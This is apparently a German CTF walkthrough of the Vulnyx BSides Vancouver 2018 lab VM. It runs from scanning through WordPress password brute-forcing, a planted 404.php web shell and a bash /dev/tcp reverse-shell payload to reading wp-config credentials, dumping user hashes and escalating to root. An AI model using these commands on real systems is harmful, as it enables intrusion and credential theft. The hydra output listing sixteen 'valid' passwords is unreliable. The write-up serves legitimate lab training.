BSides-Vancouver-2018-Workshop - Vulnyx - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
gobuster
wpscan
ftp
hydra
curl
grep

Inhaltsverzeichnis

Reconnaissance

Als ersten Schritt in der Reconnaissance-Phase nutzen wir ARP-Scan, um aktive Hosts im Netzwerk zu identifizieren. Dies hilft uns, das Zielsystem schnell zu lokalisieren.

┌──(root㉿cyber)-[~]
└─# arp-scan -l
192.168.2.137 08:00:27:ae:29:fe PCS Systemtechnik GmbH

Hier sehen wir die MAC-Adresse und den Hersteller des Netzwerkadapters. Dies kann uns weitere Hinweise auf das Betriebssystem oder die Art des Geräts geben.

Um die Hostnamen aufzulösen, fügen wir den gefundenen Host in die /etc/hosts-Datei ein. Dies erleichtert die weitere Arbeit mit dem Zielsystem, da wir den Hostnamen anstelle der IP-Adresse verwenden können.

┌──(root㉿cyber)-[~]
└─# vi /etc/hosts
192.168.2.137 bsides.vuln

Web Enumeration

Gobuster wird verwendet, um versteckte Verzeichnisse und Dateien auf dem Webserver zu finden.

┌──(root㉿cyber)-[~]
└─# gobuster dir -u http://bsides.vuln -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error
==============================================================================================================================

http://bsides.vuln/index (Status: 200) [Size: 177]
http://bsides.vuln/index.html (Status: 200) [Size: 177]
http://bsides.vuln/robots.txt (Status: 200) [Size: 43]
http://bsides.vuln/robots (Status: 200) [Size: 43]
http://bsides.vuln/backup_wordpress/index.php (Status: 301) [Size: 0] [--> http://bsides.vuln/backup_wordpress/]
http://bsides.vuln/backup_wordpress/index (Status: 301) [Size: 0] [--> http://bsides.vuln/backup_wordpress/index/]
http://bsides.vuln/backup_wordpress/wp-content (Status: 301) [Size: 332] [--> http://bsides.vuln/backup_wordpress/wp-content/]
http://bsides.vuln/backup_wordpress/wp-login (Status: 200) [Size: 2373]
http://bsides.vuln/backup_wordpress/wp-login.php (Status: 200) [Size: 2373]
http://bsides.vuln/backup_wordpress/license (Status: 200) [Size: 19935]
http://bsides.vuln/backup_wordpress/license.txt (Status: 200) [Size: 19935]
http://bsides.vuln/backup_wordpress/wp-includes (Status: 301) [Size: 333] [--> http://bsides.vuln/backup_wordpress/wp-includes/]
http://bsides.vuln/backup_wordpress/readme (Status: 200) [Size: 7358]
http://bsides.vuln/backup_wordpress/readme.html (Status: 200) [Size: 7358]
http://bsides.vuln/backup_wordpress/wp-trackback (Status: 200) [Size: 135]
http://bsides.vuln/backup_wordpress/wp-trackback.php (Status: 200) [Size: 135]

==============================================================================================================================
http://bsides.vuln/robots.txt

User-agent: *
Disallow: /backup_wordpress

==============================================================================================================================
http://bsides.vuln/index.html
john
Posted on March 7, 2018
Leave a comment on [Retired] This blog is no longer being maintained

Hello world!

Welcome to WordPress.
Author admin

Posted on March 7, 2018
1 Comment
http://bsides.vuln/backup_wordpress/wp-login.php

ERROR: The password you entered for the
username admin is incorrect.
Lost your password?

Initial Access

WPScan wird verwendet, um WordPress-spezifische Informationen zu sammeln und Schwachstellen zu identifizieren.

┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.137 -p- | grep open
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.137 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-14 00:06 CEST
Nmap scan report for bsides.vuln (192.168.2.137)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.2.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 859f8b5844973398ee98b0c185603c41 (DSA)
| 2048 cf1a04e17ba3cd2bd1af7db330e0a09d (RSA)
|_ 256 97e5287a314d0a89b2b02581d536634c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Das Nmap ergebnis zeigt uns dass ein ftp server läuft und anonym zugänglich ist.

┌──(root㉿cyber)-[~]
└─# ftp 192.168.2.137
Connected to 192.168.2.137.
220 (vsFTPd 2.3.5)
Name (192.168.2.137:cyber): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||45073|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Mar 03 2018 .
drwxr-xr-x 3 0 0 4096 Mar 03 2018 ..
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.

Die Anonymous FTP anmeldung ist erfolgreich.

ftp> cd public
250 Directory successfully changed.
ftp> ls l-a
229 Entering Extended Passive Mode (|||37718|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||39715|).
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 .
drwxr-xr-x 3 0 0 4096 Mar 03 2018 ..
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.
ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
229 Entering Extended Passive Mode (|||62283|).
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
100% |*************************************************| 31 110.08 KiB/s 00:00 ETA
226 Transfer complete.
31 bytes received in 00:00 (61.03 KiB/s)
ftp> put h
hack.txt hash hydra.restore

ftp> put hack.txt
local: hack.txt remote: hack.txt
229 Entering Extended Passive Mode (|||17502|).
550 Permission denied.
ftp> cd /home
550 Failed to change directory

Die datei users.txt.bk wurde runtergeladen.

┌──(root㉿cyber)-[~]
└─# cat users.txt.bk
abatchy
john
mai
anne
doomguy
┌──(root㉿cyber)-[~]
└─# wpscan --url http://bsides.vuln/backup_wordpress --usernames john --passwords /usr/share/wordlists/rockyou.txt
[+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <===============> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 1 user/s [SUCCESS] - john / enigma Trying john / enigma Time: 00:00:01 < > (15 / 14344413) 0.00% ETA: ??:??:?? [!] Valid Combinations Found:
| Username: john, Password: enigma [+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 0
| Requests Remaining: 23

[+] Finished: Wed Jun 14 00:25:00 2023
[+] Requests Done: 157
[+] Cached Requests: 40
[+] Data Sent: 48.108 KB
[+] Data Received: 41.151 KB
[+] Memory used: 259.852 MB
[+] Elapsed time: 00:00:07

Wordpress login Daten knacken.

http://bsides.vuln/backup_wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentysixteen
plugin lfi exploit

Edit Themes
Twenty Sixteen: 404 Template (404.php)
Select theme to edit:
system($ GET['cmd']);
/**
* The template for displaying 404 pages (not found)
*
* @package WordPress
* @subpackage Twenty_Sixteen
* @since Twenty Sixteen 1.0
*/
?>
┌──(root㉿cyber)-[~]
└─# curl "http://bsides.vuln/backup_wordpress/wp-content/themes/twentysixteen/404.php?cmd=ls"
404.php
archive.php
comments.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
languages
page.php
readme.txt
rtl.css
screenshot.png
search.php
searchform.php
sidebar-content-bottom.php
sidebar.php
single.php
style.css
template-parts

LFI Schwachstelle gefunden.

┌──(root㉿cyber)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
PAYLOAD: http://bsides.vuln/backup_wordpress/wp-content/themes/twentysixteen/404.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.127%2F4444%200%3E%261%27
┌──(root㉿cyber)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.127] from (UNKNOWN) [192.168.2.137] 35734
bash: no job control in this shell backup_wordpress/wp-content/themes/twentysixteen$

Hier wurde eine Reverse Shell erstellt.

www-data@bsides2018:/var/www/backup_wordpress$ cat wp-config.php
define('DB_NAME', 'wp');
define('DB_USER', 'john@localhost');
define('DB_PASSWORD', 'thiscannotbeit');

Die Config der WordPress seite wurde ausgelesen.

www-data@bsides2018:/var/www/backup_wordpress$ ls -la /home/ drwxr-xr-x 7 root root 4096 Mar 4 2018 .
drwxr-xr-x 23 root root 4096 Mar 3 2018 ..
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 abatchy
drwxr-xr-x 2 anne anne 4096 Mar 4 2018 anne
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 doomguy
drwxr-xr-x 2 john john 4096 Mar 3 2018 john
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 mai
www-data@bsides2018:/var/www/backup_wordpress$ ss -altpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 127.0.0.1:3306 *:*
LISTEN 0 128 :::80 :::*
LISTEN 0 5 127.0.0.1:53 *:*
LISTEN 0 32 *:21 *:*
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:631 *:*
LISTEN 0 128 ::1:631 :::*
www-data@bsides2018:/var/www/backup_wordpress$ mysql -u john@localhost -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1630
Server version: 5.5.54-0ubuntu0.12.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
+--------------------+\
| Database |
+--------------------+\
| information_schema |
| wp |
+--------------------+\
2 rows in set (0.00 sec)
use wp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
show tables;
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BmuGRQyHFjh1FW29/KN6GvfYnwIl/O0 | admin | admin@thissite.com | | 2018-03-07 20:05:07 | | 0 | admin |
| 2 | john | $P$BVlPsus0zgh1RoU3VGUI4zfyNNPcyT0 | john | john@thissite.com | | 2018-03-07 20:06:16 | | 0 | john |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.00 sec)
www-data@bsides2018:/var/www/backup_wordpress$ ls -la /home/ -R
/home/:
total 28
drwxr-xr-x 7 root root 4096 Mar 4 2018 .
drwxr-xr-x 23 root root 4096 Mar 3 2018 ..
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 abatchy
drwxr-xr-x 2 anne anne 4096 Mar 4 2018 anne
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 doomguy
drwxr-xr-x 2 john john 4096 Mar 3 2018 john
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 mai

/home/abatchy:
total 108
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw------- 1 abatchy abatchy 334 Mar 7 2018 .ICEauthority
-rw------- 1 abatchy abatchy 0 Mar 7 2018 .Xauthority
-rw------- 1 abatchy abatchy 16 Mar 7 2018 .bash_history
drwx------ 11 abatchy abatchy 4096 Mar 7 2018 .cache
drwx------ 8 abatchy abatchy 4096 Mar 7 2018 .config
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .dbus
-rw-r--r-- 1 abatchy abatchy 25 Mar 7 2018 .dmrc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .gconf
drwx------ 4 abatchy abatchy 4096 Mar 7 2018 .gnome2
-rw-rw-r-- 1 abatchy abatchy 147 Mar 7 2018 .gtk-bookmarks
drwx------ 2 abatchy abatchy 4096 Mar 6 2018 .gvfs
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 .local
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .mission-control
drwx------ 2 abatchy abatchy 4096 Mar 7 2018 .pulse
-rw------- 1 abatchy abatchy 256 Mar 7 2018 .pulse-cookie
-rw------- 1 abatchy abatchy 10431 Mar 7 2018 .xsession-errors
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Desktop
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Documents
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Downloads
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Music
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Pictures
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Public
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Templates
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Videos

/home/abatchy/.local/share:
total 24
drwxr-xr-x 5 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 ..
-rw-rw-r-- 1 abatchy abatchy 0 Mar 7 2018 .converted-launchers
-rw-rw-r-- 1 abatchy abatchy 834 Mar 7 2018 gsettings-data-convert
drwxrwxr-x 2 abatchy abatchy 4096 Mar 7 2018 icc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 telepathy
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 zeitgeist

/home/doomguy:
total 32
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 doomguy doomguy 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 doomguy doomguy 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 doomguy doomguy 675 Mar 3 2018 .profile
-rw-r--r-- 1 doomguy doomguy 8445 Mar 3 2018 examples.desktop

/home/john:
total 32
drwxr-xr-x 2 john john 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 john john 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 john john 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 john john 675 Mar 3 2018 .profile
-rw-r--r-- 1 john john 8445 Mar 3 2018 examples.desktop

/home/mai:
total 32
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 mai mai 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 mai mai 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 mai mai 675 Mar 3 2018 .profile
-rw-r--r-- 1 mai mai 8445 Mar 3 2018 examples.desktop
www-data@bsides2018:/var/www/backup_wordpress$ find / -type f -perm -4000 -ls 2>/dev/null
262307 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
262197 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
262271 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
262270 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
262232 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
262298 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
272145 12 -rwsr-xr-x 1 root root 9760 Sep 11 2013 /usr/lib/policykit-1/polkit-agent-helper-1
266093 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
292699 244 -rwsr-xr-x 1 root root 248056 Aug 11 2016 /usr/lib/openssh/ssh-keysign
266105 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
265644 12 -rwsr-xr-x 1 root root 9728 Sep 30 2013 /usr/lib/pt_chown
262496 16 -rwsr-xr-x 1 root root 13860 Nov 8 2011 /usr/bin/arping
262502 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
262576 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
263538 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
263493 72 -rwsr-xr-x 1 root root 69708 Feb 27 2013 /usr/bin/sudo
263162 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
262838 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
263231 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
263182 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
263069 12 -rwsr-xr-x 1 root lpadmin 9768 May 13 2013 /usr/bin/lppasswd
263494 72 -rwsr-xr-x 1 root root 69708 Feb 27 2013 /usr/bin/sudoedit
262579 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
262449 12 -rwsr-sr-x 1 root root 9524 Jan 6 2014 /usr/bin/X
263276 20 -rwsr-xr-x 1 root root 18104 Sep 11 2013 /usr/bin/pkexec
274568 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
274493 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd

Suche nach SUID ausführbaren.

┌──(root㉿cyber)-[~]
└─# hydra -l anne -P /usr/share/wordlists/rockyou.txt http-get://192.168.2.137/backup_wordpress
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-14 00:56:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344405 login tries (l:1/p:14344405), ~896526 tries per task
[DATA] attacking http://192.168.2.137:80/backup_wordpress
[80][http-get] host: 192.168.2.137 login: anne password: imdrippinbiatch
[80][http-get] host: 192.168.2.137 login: anne password: 123456
[80][http-get] host: 192.168.2.137 login: anne password: sqluserrootpassw0r4
[80][http-get] host: 192.168.2.137 login: anne password: hostinger
[80][http-get] host: 192.168.2.137 login: anne password: y0uC@n'tbr3akIT
[80][http-get] host: 192.168.2.137 login: anne password: 12345
[80][http-get] host: 192.168.2.137 login: anne password: 123456789
[80][http-get] host: 192.168.2.137 login: anne password: password
[80][http-get] host: 192.168.2.137 login: anne password: iloveyou
[80][http-get] host: 192.168.2.137 login: anne password: princess
[80][http-get] host: 192.168.2.137 login: anne password: 1234567
[80][http-get] host: 192.168.2.137 login: anne password: rockyou
[80][http-get] host: 192.168.2.137 login: anne password: 12345678
[80][http-get] host: 192.168.2.137 login: anne password: enigma
[80][http-get] host: 192.168.2.137 login: anne password: highschoolmusical
[80][http-get] host: 192.168.2.137 login: anne password: abc123
1 of 1 target successfully completed, 16 valid passwords found

Hydra wird verwendet, um Passwörter zu bruteforcen.

www-data@bsides2018:/var/backups$ su anne
Password: princess
anne@bsides2018:/var/backups$ sudo -l
[sudo] password for anne: Matching Defaults entries for anne on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anne may run the following commands on this host:
(ALL : ALL) ALL
anne@bsides2018:/var/backups$ sudo su
root@bsides2018:/var/backups# cat /root/flag.txt
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

Flags

Root.txt 5C42D6BB0EE9CE4CB7E7349652C45C4A
cat user.txt c7d0a8de1e03b25a6f7ed2d91b94dad6